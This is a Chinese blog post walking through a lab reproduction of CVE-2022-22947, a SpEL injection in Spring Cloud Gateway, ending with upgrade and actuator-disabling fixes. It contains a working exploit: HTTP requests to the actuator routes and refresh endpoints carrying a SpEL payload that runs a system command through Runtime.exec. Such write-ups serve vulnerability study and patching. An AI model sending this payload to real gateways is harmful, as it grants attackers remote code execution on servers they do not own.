spring 命令执行 (CVE-2022-22947)

最新推荐文章于 2025-01-16 10:17:55 发布
最新推荐文章于 2025-01-16 10:17:55 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: springcloud web安全 spel Gateway
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40646572/article/details/130631247
版权

漏洞原理

该漏洞产生的原因是由于,当AddResponseHeaderGatewayFilterFactory传入的值进行计算(getValue())的时候,会逐一向上调用对应的方法,直到进入带有SpEL表达式解析器的位置进行最后的解析,从而触发了SpEL表达式注入漏洞。

漏洞影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7

漏洞复现过程

在这里插入图片描述
开启服务后,使用目录爆破工具跑一下(正常情况下)。
在这里插入图片描述
发现存在actuator url地址泄露。并且存在headdump文件,使用java -jar JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump进行一波分析,没发现有用的信息。
在这里插入图片描述

在这里插入图片描述
继续子目录爆破,发现可以存在routes页面。
在这里插入图片描述
在http://192.168.5.128:21849/actuator/gateway/routes/页面下,发现路由信息。
在这里插入图片描述
注意此处需要Content-Type: application/json

POST /actuator/gateway/routes/test

在这里插入图片描述
添加spel语句,执行系统指令。

{
"id": "test",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
"name": "cmd"
}
}
],
"uri": "http://example.com:80",
"order": 0
}

POST /actuator/gateway/refresh

在这里插入图片描述
使用POST请求刷新路由信息。
在这里插入图片描述
查看刚添加的路由信息,发现命令执行结果已经出现在路由信息中。

注意

该漏洞的利用需要在网关的场景中出现时需要应用暴露actuator,因此有一定前置条件。

修复建议

1、版本更新(注意备份)
2、缓解措施:如果不需要Gateway actuator endpoint,可通过 management.endpoint.gateway.enabled: false 禁用它。

参考链接

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947):https://blog.youkuaiyun.com/xiaobai_20190815/article/details/124045768
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析:https://blog.youkuaiyun.com/m0_61506558/article/details/126914956
SpringCloud Gateway 漏洞分析 (CVE-2022-22947):https://www.cnblogs.com/9eek/p/16243402.html

Spring RCE 漏洞 CVE-2022-22965 的终极解决方案
oscar999的专栏
04-01 1万+
Spring框架爆出的RCE(远程命令执行)漏洞,现在这个漏洞有了统一的编号: **CVE-2022-22965**。 这个漏洞的主要原因是在JDK 9+版本里,Spring MVC 的数据绑定时出现的漏洞。
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1885
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
god_Zeo的安全博客
03-06 5113
0x01 Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。华为云提醒使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。 参考链接: CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability CVE-2022-22947: SPEL CASTING AND EVIL
Spring命令执行CVE-2022-22947_POC)
weixin_51721627的博客
07-11 487
CVE-2022-22947_POC
vulfocus复现:spring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 4198
vulfocus复现:spring 命令执行 (CVE-2022-22947)
[Vulfocus解题系列]spring 命令执行CVE-2022-22947
00勇士王子的博客
06-03 1450
使用docker部署环境。
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马
qq_61860998的博客
06-22 3031
springboot gateway命令执行+内存马
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3445
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
jspider网络蜘蛛工具
01-12
解压进入bin目录,用命令行jspider http://域名 download可以下载全部网页,另外还可以查看网站的错误
Spring Cloud Gateway 远程代码执行(CVE-2022-22947
m0_62484818的博客
10-09 788
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式。Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
Fiverya的博客
01-10 1380
CVE-2022-22947
SpringCloudGateway远程代码执行(CVE-2022-22947
m0_57379855的博客
03-12 1606
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
m0_58596609的博客
10-11 2126
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
最新发布
weixin_55885866的博客
01-16 1062
Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2"args": {}],201表示创建成功POST /actuator/gateway/refresh HTTP/1.1Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2。
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
aihua002的博客
11-21 1037
1.漏洞说明:2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。2.漏洞编号:3.影响范围:旧的、不受支持的版本也会受到影响4.漏洞级别:高危。
探秘JDumpSpider:一款高效网页数据抓取工具
gitblog_00035的博客
04-09 807
探秘JDumpSpider:一款高效网页数据抓取工具 项目地址:https://gitcode.com/gh_mirrors/jd/JDumpSpider 项目简介 是一个开源的Java爬虫框架,由开发者whwlsfb贡献。它旨在帮助用户快速、有效地抓取和解析网页上的信息,尤其适合大数据分析和网站监控等需求。这款工具基于Jsoup库,并结合了多线程与队列机制,提供了强大的数据抓取功能。 技术分析 ...
cve-2022-22947漏洞原理
07-29
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞是Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。具体来说,当使用Spring Cloud Gateway的应用程序对外暴露了Gateway Actuator接口时,攻击者可以发送恶意请求,利用漏洞进行代码注入攻击,从而在远程主机上执行任意远程代码。这个漏洞的影响范围包括Spring Cloud Gateway 3.1.x < 3.1.1和Spring Cloud Gateway 3.0.x < 3.0.7版本,以及其他旧的、不受支持的Spring Cloud Gateway版本。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)](https://blog.youkuaiyun.com/qq_49619863/article/details/127350543)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://blog.youkuaiyun.com/weixin_45260839/article/details/124650584)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值